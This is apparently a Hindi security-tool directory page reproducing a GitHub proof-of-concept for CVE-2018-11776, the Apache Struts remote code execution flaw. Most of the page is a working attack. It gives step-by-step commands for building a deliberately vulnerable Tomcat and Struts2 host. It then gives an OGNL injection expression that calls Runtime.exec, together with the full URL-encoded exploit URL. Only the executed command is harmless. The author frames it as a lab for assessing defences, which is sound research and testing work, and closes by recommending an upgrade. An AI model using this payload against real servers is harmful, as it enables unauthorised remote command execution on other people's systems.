Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-11776 — एक असुरक्षित वातावरण बनाना और PoC | Kitploit
उपकरण/GitHubGitHub/xfox64x/cve-2018-11776
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubxfox64x/cve-2018-11776

CVE-2018-11776

एक असुरक्षित वातावरण बनाना और PoC

रिपॉजिटरी देखें
15626 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-11776

प्रूफ ऑफ कॉन्सेप्ट शोषण ताकि मैं जल्दी से आकलन कर सकूं कि किस प्रकार की सुरक्षा और फिक्स उपलब्ध हैं।

मूलतः खोजा गया Man Yue Mo, Semmle द्वारा: https://semmle.com/news/apache-struts-CVE-2018-11776

Semmle के पास "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube वीडियो थोड़ी देर के लिए उपलब्ध था, लेकिन मुझे लगता है कि यह चला गया है या कम से कम अब Semmle से लिंक नहीं है: https://www.youtube.com/watch?v=5SDNX20SLJ0

उपरोक्त से जानकारी ली और फिर struts रिपॉजिटरी के कमिट्स को देखना शुरू किया: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5

मैं डॉकर या जो भी बकवास करने के लिए बहुत आलसी हूँ...

एक असुरक्षित होस्ट सेट करना और उसका शोषण करना

नवीनतम Ubuntu Desktop ISO डाउनलोड करें और एक वर्चुअल मशीन बनाएं।

http://releases.ubuntu.com/18.04.1/ubuntu-18.04.1-desktop-amd64.iso?_ga=2.265574989.317727484.1535056103-825490018.1535056103

निर्भरताएँ स्थापित करें:

sudo apt-get update

sudo apt-get upgrade

sudo apt-get dist-upgrade

sudo apt-get install default-jdk vim net-tools

Tomcat सेट करें:

mkdir ~/sources

cd ~/sources

wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz

tar xvzf apache-tomcat-7.0.90.tar.gz

sudo mv apache-tomcat-7.0.90 /opt/tomcat

bashrc को वेरिएबल्स के साथ अपडेट करें:

vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java

export CATALINA_HOME=/opt/tomcat

. ~/.bashrc

Tomcat GUI में एक एडमिन जोड़ें:

sudo vim /opt/tomcat/conf/tomcat-users.xml

root@kitploit:~
<user username="username" password="password" roles="manager-gui,admin-gui" />

एक असुरक्षित Struts2 Showcase प्राप्त करें ताकि हमारे पास काम करने के लिए कुछ हो:

cd ~/sources

wget http://central.maven.org/maven2/org/apache/struts/struts2-showcase/2.3.14/struts2-showcase-2.3.14.war

Tomcat GUI के माध्यम से WAR फ़ाइल को डिप्लॉय करें:

$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/manager/html

Tomcat को पुनरारंभ करें और जाँचें कि Struts2 Showcase उपलब्ध है:

$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/manager/html

बिना नेमस्पेस के एक असुरक्षित रीडायरेक्शन एक्शन जोड़ें:

vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

root@kitploit:~
    <action name="help">
            <result type="redirectAction">
                    <param name="actionName">date.action</param>
            </result>
    </action>

date.action पहले से परिभाषित है, इसलिए हमने बस एक और रीडायरेक्ट एक्शन जोड़ा जो date.action को कॉल करता है।

डिफ़ॉल्ट रूप से, alwaysSelectFullNamespace को True पर सेट होना चाहिए।

Tomcat को पुनरारंभ करें और Struts2 Showcase पृष्ठ देखें:

$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp

काम करने के लिए OGNL एक्सप्रेशन बनाएँ। चलिए वही करते हैं जो Semmle ने अपने YouTube वीडियो में किया होगा:

%{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}

OGNL एक्सप्रेशन को URL-एन्कोडेड किया जाना चाहिए और URL में अंतिम '/' से पहले डाला जाना चाहिए, हमारे असुरक्षित help.action को हिट करते हुए:

127.0.0.1:8080/struts2-showcase-2.3.14/<encoded-command-goes-here>/help.action

127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action

असुरक्षित Ubuntu होस्ट पर निष्पादित करने पर, हमें एक नया कैलकुलेटर इंस्टेंस पॉप अप होता दिखना चाहिए।

मुद्दे को ठीक करने वाले संबंधित कमिट्स:

https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5

विचार:

स्ट्रट्स का एक और अत्यंत विशिष्ट, असुरक्षित कार्यान्वयन। इस कमजोरी के मीडिया कवरेज ने सभी को घबरा दिया था, हालांकि केवल सबसे लापरवाह कोड/कॉन्फ़िगरेशन ही वास्तव में असुरक्षित हैं... मैं इस कमजोरी को विश्वसनीय रूप से खोजने और/या इसका शोषण करने का कोई कुशल, गुप्त तरीका नहीं सोच सकता। मेरी सिफारिश: बस स्ट्रट्स को अपग्रेड करो... (या इसका उपयोग बंद करो)

टूल डाउनलोड करें